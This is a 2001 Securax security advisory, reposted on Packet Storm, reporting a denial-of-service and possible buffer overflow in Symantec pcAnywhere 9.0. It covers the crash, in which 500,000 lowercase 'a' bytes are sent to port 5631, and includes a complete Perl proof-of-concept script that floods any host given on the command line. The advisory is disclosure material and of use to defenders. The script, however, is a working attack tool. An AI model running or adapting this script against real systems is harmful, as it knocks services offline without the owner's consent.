scx-sa-14.txt

2001-02-14T00:00:00
ID PACKETSTORM:24293
Type packetstorm
Reporter Root-dude
Modified 2001-02-14T00:00:00

Description

                                        
                                            `=============================================================================  
Securax-SA-14 Security Advisory  
belgian.networking.security Dutch  
=============================================================================  
Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow  
Announced: 2001-02-08  
Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE  
=============================================================================  
  
  
  
Note: This entire advisory has been based upon trial and error results. We  
can not ensure the information below is 100% correct being that we do  
not have any source code to audit. This document is subject to change  
without prior notice.  
  
If you happen to find more information / problems concerning the below  
problem or further varients please contact me on the following email  
incubus@securax.net, or you can contact info@securax.org.  
  
  
I. Problem Description  
-----------------------  
  
Symantec PcAnywhere is a program that will allow others (who are authorised  
to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal  
server.  
  
PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631  
(pcanywheredata, according to nmap) and 65301 (pcanywhere). And when a user  
sends certain data in a particular way, pcAnywhere will crash.  
  
When a large amount (it depends, sometimes the host will go down with 320k  
characters, sometimes, you will have to send 500k bytes of data) are sent to  
a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, and  
give an error on the screen, and write the "Unexpected program error" to a  
logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161)  
  
Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.  
  
Why no exploit, just a lame Denial of Service?  
  
1.) because I suck in win32 debugging / overflowing (but i'm reading)  
/* so if I can overflow win32 progs, i'll code an exploit */  
2.) as the amount of data is variable, it's hard to overflow..  
  
The DoS code:  
  
<--bof-->  
  
#!/usr/bin/perl  
  
# Symantec PcAnywhere 9.0 Denial of Service  
# -----------------------------------------  
# by incubus <incubus@securax.net>  
# http://www.hexyn.be  
#  
# http://www.securax.net  
# All my love to Tessa.  
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,  
# Zym0tic, segfault, #securax@irc.hexyn.be  
# Thanks to jurgen swennen, for letting me (ab)use his computer.  
#  
# this is intended as proof of concept, do not abuse!  
  
use IO::Socket;  
$host = "$ARGV[0]";  
$port = 5631;  
if ($#ARGV<0) {  
print "use it like: $0 <hostname>\n";  
exit();  
}  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,   
PeerPort=>$port) || die "damn, ";  
print "hello\n";  
$buf = "";  
for($counter = 0; $counter < 500000; $counter++) {  
$buf .= "\x61";  
}  
print $socket "$buf\n";  
close($socket);  
exit();  
  
<--eof-->  
  
  
II. Impact  
----------  
  
If someone exploits this, than Symantec is forced to rename the name of this  
product to PcAnyoneAnywhere or something...  
  
No, seriously, this could lead to a compromise of a system.  
  
  
III. possible workarounds  
-------------------------  
  
This advisory was also sent to Symantec (info@symantec.com), we'll see what  
they do with it...  
  
IV credits  
----------  
love to Tessa.  
greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,  
and so many, many others I forgot...  
  
  
=============================================================================  
For more information incubus@securax.org  
Website http://www.securax.org  
Advisories/Text http://www.securax.org/pers  
-----------------------------------------------------------------------------  
  
`